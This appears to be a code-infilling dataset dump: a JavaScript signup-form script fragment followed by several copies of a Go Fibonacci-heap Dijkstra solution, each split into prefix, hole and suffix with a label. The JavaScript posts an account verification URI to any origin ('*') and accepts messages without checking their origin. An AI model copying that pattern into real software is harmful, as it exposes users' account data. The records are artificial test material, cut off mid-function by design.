trigger anything, and instead let `function register` call `validate`
on each input, later. */
function setInputValue(name, val) {
findInputElm(name).val(val);
}
function findInputElm(name) {
var selector = 'form.reg [name="' + name + '"]';
return $(selector);
}
function handleAccountCreationSuccess(verificationUri) {
postMessageToZopim('accountCreated', verificationUri);
}
function handleAccountCreationFailure() {
elements.root.addClass('error');
toggleLoading(false, 'loading-creating');
}
function translatedParagraph(clazz) {
return elements.root.find('.translated').find('.' + clazz);
}
function postMessageToZopim(action, data) {
window.top.postMessage(JSON.stringify({
target: 'zdSignup',
action: action,
data: data
}), '*');
}
function toggleLoading(isLoading, clazz) {
clazz = (clazz || '') + ' loading';
elements.root.toggleClass(clazz, isLoading);
}
/* Test with any of
```
window.postMessage(JSON.stringify({
owner_email: 'foo@bar.com',
owner_phone: '123-123-1234',
owner_name: 'first last',
company_name: 'megacorp',
number_employees: 234,
language: 'fr',
currency: 'EUR',
agents: [
{
name: 'agent num0',
email: 'agent+0@zendesk.com'
},
{
name: 'agent num1',
email: 'agent+1@zendesk.com'
}
],
plan_name: 'this is the plan name'
}), window.location.origin)
window.postMessage('{"owner_name":"Test Agent Owner","owner_email":"testagent@zopim.com","agents":[{"name":"Test Agent 1","email":"a1@z.com"},{"name":"Test Agent 2","email":"a2@z.com"},{"name":"Test Agent 3","email":"a3@z.com"},{"name":"Test Agent 4","email":"a4@z.com"},{"name":"Test Agent 5","email":"a5@z.com"}],"company_name":"testaccount","number_employees":"","language":"en"}', location.origin)
``` */
$(window).on('message onmessage', function(e) {
var chatAccount_ = e.data || (e.originalEvent && e.originalEvent.data);
if (!chatAccount_) {
return;
}
try {
chatAccount_ = JSON.parse(chatAccount_);
} catch (err) {
return;
}
// Ignore a myriad of other kinds of valid `postMessage`s.
if (!chatAccount_.owner_email) {
return;
}
chatAccount = chatAccount_;
if (chatAccount.agents && chatAccount.agents.length) {
$('.include-agents').addClass(shownClass);
}
toggleLoading(false);
});
/* After onmessage handler is attached, let the embedding zopim page know
it can postMessage to this reg form. */
postMessageToZopim('formReady');
$('.reg-xsell-from-chat-already-have').on('click', function() {
postMessageToZopim('showIntegrate');
});
elements.subdomainContainer
.addClass(shownClass)
.find('input')
.prop('placeholder', translatedParagraph('subdomain-placeholder').text());
elements.passwordContainer
.find('input')
.prop('placeholder', translatedParagraph('password-placeholder').text());
swapNextButtonHandler();
});
| isValid | identifier_name |
full_heap.go | /**
This is Dijkstra on Fibonacci Heap realisation in one file
that solves this Codeforces Problem https://codeforces.com/contest/20/problem/C
(It gives TL but only because GO is a little slow without optimizations)
@author SeaEagle
*/
package main
import (
"errors"
"fmt"
)
func main() {
var n, m int
fmt.Scan(&n, &m)
g := Graph{Size: n}
for i := 0; i < m; i++ {
var from, to, cost int
fmt.Scan(&from, &to, &cost)
g.AddEdge(Edge{From: from, To: to, Cost: int64(cost)})
}
dist, path := ShortestPathHeap(&g, 1, n)
if dist == Inf {
fmt.Println(-1)
} else {
for _, val := range path {
fmt.Printf("%v ", val)
}
}
}
type GNode = int
type IntPair struct {
first int
second int64
}
func (i IntPair) LessThen(j interface{}) bool {
return i.second < j.(IntPair).second
}
func (i IntPair) EqualsTo(j interface{}) bool {
return i.second == j.(IntPair).second
}
func (i IntPair) MinusInf() Value {
return IntPair{-1e9, -Inf}
}
type Edge struct {
From GNode
To GNode
Cost int64
}
const Inf = 1e18
type Graph struct {
Size int
edges map[GNode][]IntPair
}
func (g *Graph) AddEdge(e Edge) {
if g.Size == 0 || g.edges == nil {
g.init()
}
if g.edges[e.From] == nil {
g.edges[e.From] = make([]IntPair, 0)
}
if g.edges[e.To] == nil {
g.edges[e.To] = make([]IntPair, 0)
}
g.edges[e.From] = append(g.edges[e.From], IntPair{e.To, e.Cost})
g.edges[e.To] = append(g.edges[e.To], IntPair{e.From, e.Cost})
}
func (g *Graph) init() {
g.edges = make(map[GNode][]IntPair)
}
func DijkstraHeap(g *Graph, start int) (dist []int64, p []GNode) {
dist = make([]int64, g.Size+1)
p = make([]int, g.Size+1)
for i := range dist {
dist[i] = Inf
}
dist[start] = 0
heap := FibonacciHeap{}
heap.Insert(IntPair{start, 0})
for !heap.IsEmpty() {
var cur IntPair
tmp, _ := heap.ExtractMin()
cur = tmp.(IntPair)
v := cur.first
for _, pair := range g.edges[v] {
to := pair.first
cost := pair.second
if dist[to] > dist[v]+cost {
heap.DeleteKey(IntPair{to, dist[to]})
dist[to] = dist[v] + cost
p[to] = v
heap.Insert(IntPair{to, dist[to]})
}
}
}
return
}
func ShortestPathHeap(g *Graph, start int, finish int) (dist int64, path []GNode) {
d, pr := DijkstraHeap(g, start)
dist = d[finish]
if dist == Inf {
return
}
path = make([]GNode, 0)
path = append(path, finish)
for start != finish {
finish = pr[finish]
path = append(path, finish)
}
for i, j := 0, len(path)-1; i < j; i, j = i+1, j-1 {
path[i], path[j] = path[j], path[i]
}
return
}
//Value is an interface every heap value must implement
//Three self-explanatory methods
type Value interface {
LessThen(j interface{}) bool
EqualsTo(j interface{}) bool
MinusInf() Value
}
//Node is a struct for node, all Values need to implement Value interface
type Node struct {
key Value
parent *Node
child *Node //Only one child, we can iterate children cyclical using left right pointers
left *Node //Cyclic doubly-linked-list
right *Node
degree int //Number of child ren
marked bool //If we already cut this node's child
}
//FibonacciHeap is represented with pointer to minimum, size
//and hashmap (value, pointer to node with that value)
//THAT MEANS TO USE DECREASE CORRECTLY YOU NEED UNIQUE ENTIES
//It could be done with some sort of hashes in your structure
type FibonacciHeap struct {
min *Node
size int
nodes map[Value]*Node
}
//Decrease method accepts old and new value and changes that in heap
//If there is no entry that matches OR new value is bigger than old
//A not-nil error is returned
func (f *FibonacciHeap) Decrease(x Value, newVal Value) error {
if f.nodes[x] == nil {
return errors.New("no such element in heap")
}
if !newVal.LessThen(x) && !newVal.EqualsTo(x) {
return errors.New("cannot increase element")
}
node := f.nodes[x]
delete(f.nodes, x) //Delete entry from map and put updated one
f.nodes[newVal] = node
node.key = newVal
if node.parent == nil || node.parent.key.LessThen(newVal) { //If it is root or we don't break the heap
f.updateMin(node)
return nil //Update minimum and return
}
parent := node.parent
f.cut(node) //Cut the subtree out and make it a new root
f.cascadingCut(parent) //Do it with all parents if needed
return nil
}
//cascadingCut is a method that goes up a heap,
//and cuts every parent who is <b>marked</b>
func (f *FibonacciHeap) cascadingCut(node *Node) {
for node.parent != nil && node.marked {
parent := node.parent
f.cut(node)
node = parent
}
if node.parent != nil {
node.marked = true
f.updateMin(node.parent)
}
f.updateMin(node)
}
//cut is a method to cut out a sub-heap from parent
//and take it out to roots level
func (f *FibonacciHeap) cut(node *Node) {
node.left.right, node.right.left = node.right, node.left //cut the node from linked list
node.parent.degree--
if node.parent.child == node { //If this node is the main child, we need to make a new main child
if node.parent.degree == 0 {
node.parent.child = nil
} else {
node.parent.child = node.right
}
}
node.left, node.right = node, node //inserting node into top level linked list
node.parent = nil
f.uniteLists(f.min, node)
f.updateMin(node)
}
//DeleteKey accepts a Value to delete
//It is very simple - just Decrease the needed Value
//And ExtractMin-s it
func (f *FibonacciHeap) DeleteKey(x Value) error {
err := f.Decrease(x, x.MinusInf())
if err != nil {
return err
}
_, err = f.ExtractMin()
return err
}
//FindMin returns the minimum value of the heap
//Just returning the pointer to min
func (f *FibonacciHeap) FindMin() (Value, error) {
if !f.IsEmpty() {
return f.min.key, nil
} else {
return nil, errors.New("unable to get minimum from an empty heap")
}
}
//Insert inserts certain Value into heap
//By just inserting it into root-level linked-list
//To the right from minimum
func (f *FibonacciHeap) Insert(x Value) {
if f.IsEmpty() | else {
newNode := &Node{x, nil, nil, f.min, f.min.right, 0, false} //Create a new node
f.min.right.left = newNode
f.min.right = newNode
f.updateMin(newNode)
f.nodes[x] = newNode
}
f.size++
}
//ExtractMin deletes the minimum value of the heap and returns it
//If heap is empty there comes an error
//Implementation is not that simple, we cut all children
//and make them new roots, after that we need to rebuild out heap
//with consolidate method
func (f *FibonacciHeap) ExtractMin() (Value, error) {
if f.IsEmpty() {
return nil, errors.New("unable to get minimum from an empty heap")
}
res := f.min.key
delete(f.nodes, f.min.key)
if f.GetSize() == 1 { //If it was the only node return
f.min = nil
f.size = 0
return res, nil
}
f.cutChildren(f.min, f.min.child)
f.min.left.right = f.min.right
f.min.right.left = f.min.left
f.min = f.min.right //Move min pointer to the right, consolidation will fin new min
f.consolidate()
f.size--
return res, nil
}
//cutChildren is a fun-named method that cuts children from parent
//It iterates throw all children to invalidate parent pointer
//And then just makes them new roots
func (f *FibonacciHeap) cutChildren(father *Node, child *Node) {
if child == nil {
return
}
start := child
start.parent = nil
cur := child.right
for cur != start {
cur.parent = nil
cur = cur.right
}
father.child = nil
f.uniteLists(father, child)
}
//consolidate is a heavy O(log n) function
//What it does is just find two root trees with same degree
//And then hang the bigger (by node.key) one to smaller
func (f *FibonacciHeap) consolidate() {
var used = make([]*Node, f.size) //We use a slice to track collisions in node.degree
used[f.min.degree] = f.min
cur := f.min.right
for used[cur.degree] != cur { //We always go right, so if we placed something to slice, made a lap, and nothing changed, consolidation is finished
f.updateMin(cur)
if used[cur.degree] == nil { //If yet no other node with same degree recorder - record current
used[cur.degree] = cur
cur = cur.right
} else {
busy := used[cur.degree]
father, son := cur, busy
if busy.key.LessThen(cur.key) { //make father point to lighter node, son to heavier one
father, son = son, father
} else if father.key.EqualsTo(son.key) { //make sure f.min is always father
if son == f.min {
father, son = son, father
}
}
son.left.right = son.right
son.right.left = son.left //cut the son from his local linked-list
next := cur.right //remember next to be right from current cur, it can change later
if father.child == nil { //If father has no children - son is the first
father.child = son
son.left, son.right = son, son
} else { //else integrate son into children linked-list
son.left, son.right = father.child, father.child.right
father.child.right.left = son
father.child.right = son
}
used[cur.degree] = nil
son.parent = father
father.degree++
cur = next
}
f.updateMin(cur)
}
}
func (f *FibonacciHeap) updateMin(comp *Node) {
if comp.key.LessThen(f.min.key) {
f.min = comp
return
}
if comp.key.EqualsTo(f.min.key) {
if comp.parent == nil && f.min.parent != nil {
f.min = comp
return
}
for f.min.parent != nil {
f.min = f.min.parent
}
}
}
//Merge just merges two fibonacci heaps together
//It could be O(1) if we dont need to hold relevant hashmap
//That helps to do search in O(1)*
func (f *FibonacciHeap) Merge(heap *FibonacciHeap) {
if heap.size == 0 {
return
}
if f.size == 0 { //if our heap is zero-sized, just change pointers to another list
f.min = heap.min
f.size = heap.size
} else {
f.uniteLists(f.min, heap.min) //Unites two lists
f.size += heap.size
f.updateMin(heap.min)
}
for k, v := range heap.nodes { //O(n) code here!!
f.nodes[k] = v
}
}
//uniteLists is simple function that unites two cyclic doubly-linked-lists into one
func (f *FibonacciHeap) uniteLists(first *Node, second *Node) {
if second == nil || first == nil {
return
}
first.left.right = second.right
second.right.left = first.left
first.left = second
second.right = first
}
//GetSize returns current size of the heap (number of nodes)
func (f *FibonacciHeap) GetSize() int {
return f.size
}
//IsEmpty returns true if fibheap is empty
func (f *FibonacciHeap) IsEmpty() bool {
return f.size == 0
}
//init function creates an empty node and initialize hashmap
func (f *FibonacciHeap) init() {
f.min = &(Node{})
f.nodes = make(map[Value]*Node)
f.size = 0
}
| {
f.init()
f.min.key = x
f.min.left, f.min.right = f.min, f.min
f.nodes[x] = f.min
} | conditional_block |
full_heap.go | /**
This is Dijkstra on Fibonacci Heap realisation in one file
that solves this Codeforces Problem https://codeforces.com/contest/20/problem/C
(It gives TL but only because GO is a little slow without optimizations)
@author SeaEagle
*/
package main
import (
"errors"
"fmt"
)
func main() {
var n, m int
fmt.Scan(&n, &m)
g := Graph{Size: n}
for i := 0; i < m; i++ {
var from, to, cost int
fmt.Scan(&from, &to, &cost)
g.AddEdge(Edge{From: from, To: to, Cost: int64(cost)})
}
dist, path := ShortestPathHeap(&g, 1, n)
if dist == Inf {
fmt.Println(-1)
} else {
for _, val := range path {
fmt.Printf("%v ", val)
}
}
}
type GNode = int
type IntPair struct {
first int
second int64
}
func (i IntPair) LessThen(j interface{}) bool {
return i.second < j.(IntPair).second
}
func (i IntPair) EqualsTo(j interface{}) bool {
return i.second == j.(IntPair).second
}
func (i IntPair) MinusInf() Value {
return IntPair{-1e9, -Inf}
}
type Edge struct {
From GNode
To GNode
Cost int64
}
const Inf = 1e18
type Graph struct {
Size int
edges map[GNode][]IntPair
}
func (g *Graph) AddEdge(e Edge) {
if g.Size == 0 || g.edges == nil {
g.init()
}
if g.edges[e.From] == nil {
g.edges[e.From] = make([]IntPair, 0)
}
if g.edges[e.To] == nil {
g.edges[e.To] = make([]IntPair, 0)
}
g.edges[e.From] = append(g.edges[e.From], IntPair{e.To, e.Cost})
g.edges[e.To] = append(g.edges[e.To], IntPair{e.From, e.Cost})
}
func (g *Graph) init() {
g.edges = make(map[GNode][]IntPair)
}
func DijkstraHeap(g *Graph, start int) (dist []int64, p []GNode) {
dist = make([]int64, g.Size+1)
p = make([]int, g.Size+1)
for i := range dist {
dist[i] = Inf
}
dist[start] = 0
heap := FibonacciHeap{}
heap.Insert(IntPair{start, 0})
for !heap.IsEmpty() {
var cur IntPair
tmp, _ := heap.ExtractMin()
cur = tmp.(IntPair)
v := cur.first
for _, pair := range g.edges[v] {
to := pair.first
cost := pair.second
if dist[to] > dist[v]+cost {
heap.DeleteKey(IntPair{to, dist[to]})
dist[to] = dist[v] + cost
p[to] = v
heap.Insert(IntPair{to, dist[to]})
}
}
}
return
}
func ShortestPathHeap(g *Graph, start int, finish int) (dist int64, path []GNode) {
d, pr := DijkstraHeap(g, start)
dist = d[finish]
if dist == Inf {
return
}
path = make([]GNode, 0)
path = append(path, finish)
for start != finish {
finish = pr[finish]
path = append(path, finish)
}
for i, j := 0, len(path)-1; i < j; i, j = i+1, j-1 {
path[i], path[j] = path[j], path[i]
}
return
}
//Value is an interface every heap value must implement
//Three self-explanatory methods
type Value interface {
LessThen(j interface{}) bool
EqualsTo(j interface{}) bool
MinusInf() Value
}
//Node is a struct for node, all Values need to implement Value interface
type Node struct {
key Value
parent *Node
child *Node //Only one child, we can iterate children cyclical using left right pointers
left *Node //Cyclic doubly-linked-list
right *Node
degree int //Number of child ren
marked bool //If we already cut this node's child
}
//FibonacciHeap is represented with pointer to minimum, size
//and hashmap (value, pointer to node with that value)
//THAT MEANS TO USE DECREASE CORRECTLY YOU NEED UNIQUE ENTIES
//It could be done with some sort of hashes in your structure
type FibonacciHeap struct {
min *Node
size int
nodes map[Value]*Node
}
//Decrease method accepts old and new value and changes that in heap
//If there is no entry that matches OR new value is bigger than old
//A not-nil error is returned
func (f *FibonacciHeap) Decrease(x Value, newVal Value) error {
if f.nodes[x] == nil {
return errors.New("no such element in heap")
}
if !newVal.LessThen(x) && !newVal.EqualsTo(x) {
return errors.New("cannot increase element")
}
node := f.nodes[x]
delete(f.nodes, x) //Delete entry from map and put updated one
f.nodes[newVal] = node
node.key = newVal
if node.parent == nil || node.parent.key.LessThen(newVal) { //If it is root or we don't break the heap
f.updateMin(node)
return nil //Update minimum and return
}
parent := node.parent
f.cut(node) //Cut the subtree out and make it a new root
f.cascadingCut(parent) //Do it with all parents if needed
return nil
}
//cascadingCut is a method that goes up a heap,
//and cuts every parent who is <b>marked</b>
func (f *FibonacciHeap) cascadingCut(node *Node) {
for node.parent != nil && node.marked {
parent := node.parent
f.cut(node)
node = parent
}
if node.parent != nil {
node.marked = true
f.updateMin(node.parent)
}
f.updateMin(node)
}
//cut is a method to cut out a sub-heap from parent
//and take it out to roots level
func (f *FibonacciHeap) cut(node *Node) {
node.left.right, node.right.left = node.right, node.left //cut the node from linked list
node.parent.degree--
if node.parent.child == node { //If this node is the main child, we need to make a new main child
if node.parent.degree == 0 {
node.parent.child = nil
} else {
node.parent.child = node.right
}
}
node.left, node.right = node, node //inserting node into top level linked list
node.parent = nil
f.uniteLists(f.min, node)
f.updateMin(node)
}
//DeleteKey accepts a Value to delete
//It is very simple - just Decrease the needed Value
//And ExtractMin-s it
func (f *FibonacciHeap) DeleteKey(x Value) error {
err := f.Decrease(x, x.MinusInf())
if err != nil {
return err
}
_, err = f.ExtractMin()
return err
}
//FindMin returns the minimum value of the heap
//Just returning the pointer to min
func (f *FibonacciHeap) FindMin() (Value, error) {
if !f.IsEmpty() {
return f.min.key, nil
} else {
return nil, errors.New("unable to get minimum from an empty heap")
}
}
//Insert inserts certain Value into heap
//By just inserting it into root-level linked-list
//To the right from minimum
func (f *FibonacciHeap) Insert(x Value) {
if f.IsEmpty() {
f.init()
f.min.key = x
f.min.left, f.min.right = f.min, f.min
f.nodes[x] = f.min
} else {
newNode := &Node{x, nil, nil, f.min, f.min.right, 0, false} //Create a new node
f.min.right.left = newNode
f.min.right = newNode
f.updateMin(newNode)
f.nodes[x] = newNode
}
f.size++
}
//ExtractMin deletes the minimum value of the heap and returns it
//If heap is empty there comes an error
//Implementation is not that simple, we cut all children
//and make them new roots, after that we need to rebuild out heap
//with consolidate method
func (f *FibonacciHeap) | () (Value, error) {
if f.IsEmpty() {
return nil, errors.New("unable to get minimum from an empty heap")
}
res := f.min.key
delete(f.nodes, f.min.key)
if f.GetSize() == 1 { //If it was the only node return
f.min = nil
f.size = 0
return res, nil
}
f.cutChildren(f.min, f.min.child)
f.min.left.right = f.min.right
f.min.right.left = f.min.left
f.min = f.min.right //Move min pointer to the right, consolidation will fin new min
f.consolidate()
f.size--
return res, nil
}
//cutChildren is a fun-named method that cuts children from parent
//It iterates throw all children to invalidate parent pointer
//And then just makes them new roots
func (f *FibonacciHeap) cutChildren(father *Node, child *Node) {
if child == nil {
return
}
start := child
start.parent = nil
cur := child.right
for cur != start {
cur.parent = nil
cur = cur.right
}
father.child = nil
f.uniteLists(father, child)
}
//consolidate is a heavy O(log n) function
//What it does is just find two root trees with same degree
//And then hang the bigger (by node.key) one to smaller
func (f *FibonacciHeap) consolidate() {
var used = make([]*Node, f.size) //We use a slice to track collisions in node.degree
used[f.min.degree] = f.min
cur := f.min.right
for used[cur.degree] != cur { //We always go right, so if we placed something to slice, made a lap, and nothing changed, consolidation is finished
f.updateMin(cur)
if used[cur.degree] == nil { //If yet no other node with same degree recorder - record current
used[cur.degree] = cur
cur = cur.right
} else {
busy := used[cur.degree]
father, son := cur, busy
if busy.key.LessThen(cur.key) { //make father point to lighter node, son to heavier one
father, son = son, father
} else if father.key.EqualsTo(son.key) { //make sure f.min is always father
if son == f.min {
father, son = son, father
}
}
son.left.right = son.right
son.right.left = son.left //cut the son from his local linked-list
next := cur.right //remember next to be right from current cur, it can change later
if father.child == nil { //If father has no children - son is the first
father.child = son
son.left, son.right = son, son
} else { //else integrate son into children linked-list
son.left, son.right = father.child, father.child.right
father.child.right.left = son
father.child.right = son
}
used[cur.degree] = nil
son.parent = father
father.degree++
cur = next
}
f.updateMin(cur)
}
}
func (f *FibonacciHeap) updateMin(comp *Node) {
if comp.key.LessThen(f.min.key) {
f.min = comp
return
}
if comp.key.EqualsTo(f.min.key) {
if comp.parent == nil && f.min.parent != nil {
f.min = comp
return
}
for f.min.parent != nil {
f.min = f.min.parent
}
}
}
//Merge just merges two fibonacci heaps together
//It could be O(1) if we dont need to hold relevant hashmap
//That helps to do search in O(1)*
func (f *FibonacciHeap) Merge(heap *FibonacciHeap) {
if heap.size == 0 {
return
}
if f.size == 0 { //if our heap is zero-sized, just change pointers to another list
f.min = heap.min
f.size = heap.size
} else {
f.uniteLists(f.min, heap.min) //Unites two lists
f.size += heap.size
f.updateMin(heap.min)
}
for k, v := range heap.nodes { //O(n) code here!!
f.nodes[k] = v
}
}
//uniteLists is simple function that unites two cyclic doubly-linked-lists into one
func (f *FibonacciHeap) uniteLists(first *Node, second *Node) {
if second == nil || first == nil {
return
}
first.left.right = second.right
second.right.left = first.left
first.left = second
second.right = first
}
//GetSize returns current size of the heap (number of nodes)
func (f *FibonacciHeap) GetSize() int {
return f.size
}
//IsEmpty returns true if fibheap is empty
func (f *FibonacciHeap) IsEmpty() bool {
return f.size == 0
}
//init function creates an empty node and initialize hashmap
func (f *FibonacciHeap) init() {
f.min = &(Node{})
f.nodes = make(map[Value]*Node)
f.size = 0
}
| ExtractMin | identifier_name |
full_heap.go | /**
This is Dijkstra on Fibonacci Heap realisation in one file
that solves this Codeforces Problem https://codeforces.com/contest/20/problem/C
(It gives TL but only because GO is a little slow without optimizations)
@author SeaEagle
*/
package main
import (
"errors"
"fmt"
)
func main() {
var n, m int
fmt.Scan(&n, &m)
g := Graph{Size: n}
for i := 0; i < m; i++ {
var from, to, cost int
fmt.Scan(&from, &to, &cost)
g.AddEdge(Edge{From: from, To: to, Cost: int64(cost)})
}
dist, path := ShortestPathHeap(&g, 1, n)
if dist == Inf {
fmt.Println(-1)
} else {
for _, val := range path {
fmt.Printf("%v ", val)
}
}
}
type GNode = int
type IntPair struct {
first int
second int64
}
func (i IntPair) LessThen(j interface{}) bool {
return i.second < j.(IntPair).second
}
func (i IntPair) EqualsTo(j interface{}) bool {
return i.second == j.(IntPair).second
}
func (i IntPair) MinusInf() Value {
return IntPair{-1e9, -Inf}
}
type Edge struct {
From GNode
To GNode
Cost int64
}
const Inf = 1e18
type Graph struct {
Size int
edges map[GNode][]IntPair
}
func (g *Graph) AddEdge(e Edge) {
if g.Size == 0 || g.edges == nil {
g.init()
}
if g.edges[e.From] == nil {
g.edges[e.From] = make([]IntPair, 0)
}
if g.edges[e.To] == nil {
g.edges[e.To] = make([]IntPair, 0)
}
g.edges[e.From] = append(g.edges[e.From], IntPair{e.To, e.Cost})
g.edges[e.To] = append(g.edges[e.To], IntPair{e.From, e.Cost})
}
func (g *Graph) init() {
g.edges = make(map[GNode][]IntPair)
}
func DijkstraHeap(g *Graph, start int) (dist []int64, p []GNode) {
dist = make([]int64, g.Size+1)
p = make([]int, g.Size+1)
for i := range dist {
dist[i] = Inf
}
dist[start] = 0
heap := FibonacciHeap{}
heap.Insert(IntPair{start, 0})
for !heap.IsEmpty() {
var cur IntPair
tmp, _ := heap.ExtractMin()
cur = tmp.(IntPair)
v := cur.first
for _, pair := range g.edges[v] {
to := pair.first
cost := pair.second
if dist[to] > dist[v]+cost {
heap.DeleteKey(IntPair{to, dist[to]})
dist[to] = dist[v] + cost
p[to] = v
heap.Insert(IntPair{to, dist[to]})
}
}
}
return
}
func ShortestPathHeap(g *Graph, start int, finish int) (dist int64, path []GNode) {
d, pr := DijkstraHeap(g, start)
dist = d[finish]
if dist == Inf {
return
}
path = make([]GNode, 0)
path = append(path, finish)
for start != finish {
finish = pr[finish]
path = append(path, finish)
}
for i, j := 0, len(path)-1; i < j; i, j = i+1, j-1 {
path[i], path[j] = path[j], path[i]
}
return
}
//Value is an interface every heap value must implement
//Three self-explanatory methods
type Value interface {
LessThen(j interface{}) bool
EqualsTo(j interface{}) bool
MinusInf() Value
}
//Node is a struct for node, all Values need to implement Value interface
type Node struct {
key Value
parent *Node
child *Node //Only one child, we can iterate children cyclical using left right pointers
left *Node //Cyclic doubly-linked-list
right *Node
degree int //Number of child ren
marked bool //If we already cut this node's child
}
//FibonacciHeap is represented with pointer to minimum, size
//and hashmap (value, pointer to node with that value)
//THAT MEANS TO USE DECREASE CORRECTLY YOU NEED UNIQUE ENTIES
//It could be done with some sort of hashes in your structure
type FibonacciHeap struct {
min *Node
size int
nodes map[Value]*Node
}
//Decrease method accepts old and new value and changes that in heap
//If there is no entry that matches OR new value is bigger than old
//A not-nil error is returned
func (f *FibonacciHeap) Decrease(x Value, newVal Value) error {
if f.nodes[x] == nil {
return errors.New("no such element in heap")
}
if !newVal.LessThen(x) && !newVal.EqualsTo(x) {
return errors.New("cannot increase element")
}
node := f.nodes[x]
delete(f.nodes, x) //Delete entry from map and put updated one
f.nodes[newVal] = node
node.key = newVal
if node.parent == nil || node.parent.key.LessThen(newVal) { //If it is root or we don't break the heap
f.updateMin(node)
return nil //Update minimum and return
}
parent := node.parent
f.cut(node) //Cut the subtree out and make it a new root
f.cascadingCut(parent) //Do it with all parents if needed
return nil
}
//cascadingCut is a method that goes up a heap,
//and cuts every parent who is <b>marked</b>
func (f *FibonacciHeap) cascadingCut(node *Node) {
for node.parent != nil && node.marked {
parent := node.parent
f.cut(node)
node = parent
}
if node.parent != nil {
node.marked = true
f.updateMin(node.parent)
}
f.updateMin(node)
}
//cut is a method to cut out a sub-heap from parent
//and take it out to roots level
func (f *FibonacciHeap) cut(node *Node) {
node.left.right, node.right.left = node.right, node.left //cut the node from linked list
node.parent.degree--
if node.parent.child == node { //If this node is the main child, we need to make a new main child
if node.parent.degree == 0 {
node.parent.child = nil
} else {
node.parent.child = node.right
}
}
node.left, node.right = node, node //inserting node into top level linked list
node.parent = nil
f.uniteLists(f.min, node)
f.updateMin(node)
}
//DeleteKey accepts a Value to delete
//It is very simple - just Decrease the needed Value
//And ExtractMin-s it
func (f *FibonacciHeap) DeleteKey(x Value) error {
err := f.Decrease(x, x.MinusInf())
if err != nil {
return err
}
_, err = f.ExtractMin()
return err
}
//FindMin returns the minimum value of the heap
//Just returning the pointer to min
func (f *FibonacciHeap) FindMin() (Value, error) {
if !f.IsEmpty() {
return f.min.key, nil
} else {
return nil, errors.New("unable to get minimum from an empty heap")
}
}
//Insert inserts certain Value into heap
//By just inserting it into root-level linked-list
//To the right from minimum
func (f *FibonacciHeap) Insert(x Value) {
if f.IsEmpty() {
f.init()
f.min.key = x
f.min.left, f.min.right = f.min, f.min
f.nodes[x] = f.min
} else {
newNode := &Node{x, nil, nil, f.min, f.min.right, 0, false} //Create a new node
f.min.right.left = newNode
f.min.right = newNode
f.updateMin(newNode)
f.nodes[x] = newNode
}
f.size++
}
//ExtractMin deletes the minimum value of the heap and returns it
//If heap is empty there comes an error
//Implementation is not that simple, we cut all children
//and make them new roots, after that we need to rebuild out heap
//with consolidate method
func (f *FibonacciHeap) ExtractMin() (Value, error) {
if f.IsEmpty() {
return nil, errors.New("unable to get minimum from an empty heap")
}
res := f.min.key
delete(f.nodes, f.min.key)
if f.GetSize() == 1 { //If it was the only node return
f.min = nil
f.size = 0
return res, nil
}
f.cutChildren(f.min, f.min.child)
f.min.left.right = f.min.right
f.min.right.left = f.min.left
f.min = f.min.right //Move min pointer to the right, consolidation will fin new min
f.consolidate()
f.size--
return res, nil
}
//cutChildren is a fun-named method that cuts children from parent
//It iterates throw all children to invalidate parent pointer
//And then just makes them new roots
func (f *FibonacciHeap) cutChildren(father *Node, child *Node) {
if child == nil {
return
}
start := child
start.parent = nil
cur := child.right
for cur != start {
cur.parent = nil
cur = cur.right
}
father.child = nil
f.uniteLists(father, child)
}
//consolidate is a heavy O(log n) function
//What it does is just find two root trees with same degree
//And then hang the bigger (by node.key) one to smaller
func (f *FibonacciHeap) consolidate() {
var used = make([]*Node, f.size) //We use a slice to track collisions in node.degree
used[f.min.degree] = f.min
cur := f.min.right
for used[cur.degree] != cur { //We always go right, so if we placed something to slice, made a lap, and nothing changed, consolidation is finished
f.updateMin(cur)
if used[cur.degree] == nil { //If yet no other node with same degree recorder - record current
used[cur.degree] = cur
cur = cur.right
} else {
busy := used[cur.degree]
father, son := cur, busy
if busy.key.LessThen(cur.key) { //make father point to lighter node, son to heavier one
father, son = son, father
} else if father.key.EqualsTo(son.key) { //make sure f.min is always father
if son == f.min {
father, son = son, father
}
}
son.left.right = son.right
son.right.left = son.left //cut the son from his local linked-list
next := cur.right //remember next to be right from current cur, it can change later
if father.child == nil { //If father has no children - son is the first
father.child = son
son.left, son.right = son, son
} else { //else integrate son into children linked-list
son.left, son.right = father.child, father.child.right
father.child.right.left = son
father.child.right = son
}
used[cur.degree] = nil
son.parent = father
father.degree++
cur = next
}
f.updateMin(cur)
}
}
func (f *FibonacciHeap) updateMin(comp *Node) {
if comp.key.LessThen(f.min.key) {
f.min = comp
return
}
if comp.key.EqualsTo(f.min.key) {
if comp.parent == nil && f.min.parent != nil {
f.min = comp
return
}
for f.min.parent != nil {
f.min = f.min.parent
}
}
}
//Merge just merges two fibonacci heaps together
//It could be O(1) if we dont need to hold relevant hashmap
//That helps to do search in O(1)*
func (f *FibonacciHeap) Merge(heap *FibonacciHeap) {
if heap.size == 0 {
return
}
if f.size == 0 { //if our heap is zero-sized, just change pointers to another list
f.min = heap.min
f.size = heap.size
} else {
f.uniteLists(f.min, heap.min) //Unites two lists
f.size += heap.size
f.updateMin(heap.min)
}
for k, v := range heap.nodes { //O(n) code here!!
f.nodes[k] = v
}
}
//uniteLists is simple function that unites two cyclic doubly-linked-lists into one
func (f *FibonacciHeap) uniteLists(first *Node, second *Node) {
if second == nil || first == nil {
return
}
first.left.right = second.right
second.right.left = first.left
first.left = second
second.right = first
}
//GetSize returns current size of the heap (number of nodes)
func (f *FibonacciHeap) GetSize() int {
return f.size
}
//IsEmpty returns true if fibheap is empty
func (f *FibonacciHeap) IsEmpty() bool |
//init function creates an empty node and initialize hashmap
func (f *FibonacciHeap) init() {
f.min = &(Node{})
f.nodes = make(map[Value]*Node)
f.size = 0
}
| {
return f.size == 0
} | identifier_body |
full_heap.go | /**
This is Dijkstra on Fibonacci Heap realisation in one file
that solves this Codeforces Problem https://codeforces.com/contest/20/problem/C
(It gives TL but only because GO is a little slow without optimizations)
@author SeaEagle
*/
package main
import (
"errors"
"fmt"
)
func main() {
var n, m int
fmt.Scan(&n, &m)
g := Graph{Size: n}
for i := 0; i < m; i++ {
var from, to, cost int
fmt.Scan(&from, &to, &cost)
g.AddEdge(Edge{From: from, To: to, Cost: int64(cost)})
}
dist, path := ShortestPathHeap(&g, 1, n)
if dist == Inf {
fmt.Println(-1)
} else {
for _, val := range path {
fmt.Printf("%v ", val)
}
}
}
type GNode = int
type IntPair struct {
first int
second int64
}
func (i IntPair) LessThen(j interface{}) bool {
return i.second < j.(IntPair).second
}
func (i IntPair) EqualsTo(j interface{}) bool {
return i.second == j.(IntPair).second
}
func (i IntPair) MinusInf() Value {
